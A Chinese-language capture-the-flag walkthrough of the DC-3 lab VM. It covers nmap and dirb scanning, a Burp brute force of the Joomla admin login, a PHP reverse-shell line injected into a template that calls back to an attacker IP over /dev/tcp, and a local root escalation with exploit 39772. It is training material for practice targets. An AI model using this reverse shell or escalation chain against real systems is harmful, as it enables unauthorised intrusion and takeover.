2022春节一次完整的渗透测试-DC-3-阿里云开发者社区

2022春节一次完整的渗透测试-DC-3

2022-11-24 149

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： 2022春节一次完整的渗透测试-DC-3

DC靶场的下载、安装与访问在上一篇的文章中。

网络异常，图片无法展示

靶场攻略:

1、使用nmap快速扫描的命令：

nmap -sP --min-hostgroup 1024 --min-parallelism 1024 192.168.120.0/24

识别到靶场主机ip

编辑

2.使用命令：

nmap -A -p- -T4 192.168.120.135

探测靶场突破口

编辑

如图，可以看到，开放了80端口-http服务

3.访问80端口，寻找进一步突破口。如果直接使用ip访问会跳转到http://dc-2/，而无法正常加载出来。所以需要我们去添加hosts文件，跳转域名来访问靶场ip。

Windows：可以访问本地hosts，打开C:\Windows\System32\drivers\etc，修改hosts文件

编辑

Linux：在/etc/hosts文件中添加域名。

打开浏览器，访问即可。

编辑

根据提示只有一个flag，并且需要拿到root权限才能得到。并且可以知道网站的CMS系统是Joomla。

4.使用dirb扫描http://dc-3/

dirb http://dc-3 /usr/share/wordlists/dirb/big.txt

编辑

访问

http://dc-3/administrator/

编辑

5.使用Brup进行爆破账号和密码。

编辑

结果账号是admin，密码是snoopy。登录成功。

编辑

在首页Templates下发现了线索

编辑在Templates模版设置中，找到了，可编辑的php模版，这样就好弄了，在模版中添加反弹php的shell的语句，使用nc监听反弹的端口即可

<?php system("bash -c 'bash -i >& /dev/tcp/192.168.120.129/1234 0>&1' ");?>

编辑

连接成功。查看文件内容，没有什么发现，直接在进入交互模式。

编辑

通过收集信息，知道靶场环境系统为ubuntu 16.04，使用searchsploit工具，寻找到合适的提权脚本。

如图，发现可以提权的漏洞利用，查看利用方式。

编辑

显示漏洞利用的完整路径

searchsploit 39772.txt -p

编辑

将39722.txt文件复制到root目录下，然后查看文件。

cp /usr/share/exploitdb/exploits/linux/local/39772.txt /root

编辑

通过阅读39772.txt的说明，知道需要下载一个提权脚本。编辑

解压39772.zip

编辑

unzip 39772.zip

编辑

解压exploit.tar
// cd 39772
//ls
crasher.tar  exploit.tar
//tar -xvf exploit.tar
//ls
crasher.tar  ebpf_mapfd_doubleput_exploit  exploit.tar
//cd ebpf_mapfd_doubleput_exploit                  
//ls
compile.sh  doubleput.c  hello.c  suidhelper.c

编辑

首先运行./compile.sh，得到一个doubleput执行文件，再运行doubleput文件之后，成功提权

执行编译文件
// ./compile.sh
// ./doubleput
//  id                         
uid=0(root) gid=0(root) groups=0(root),33(www-data)
//whoami                    
// cd /root                
//ls
the-flag.txt
// cat the-flag.txt
cat the-flag.txt